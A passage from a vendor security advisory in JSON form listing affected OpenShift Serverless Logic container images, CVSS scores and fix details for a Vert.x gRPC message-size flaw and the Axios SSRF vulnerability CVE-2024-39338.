"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "io.vertx:vertx-grpc-client: io.vertx:vertx-grpc-server: Vertx gRPC server does not limit the maximum message size"
},
{
"cve": "CVE-2024-39338",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2024-08-13T17:21:32.774718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2304369"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: axios: Server-Side Request Forgery",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-39338"
},
{
"category": "external",
"summary": "RHBZ#2304369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304369"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases",
"url": "https://github.com/axios/axios/releases"
},
{
"category": "external",
"summary": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html",
"url": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html"
}
],
"release_date": "2024-08-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
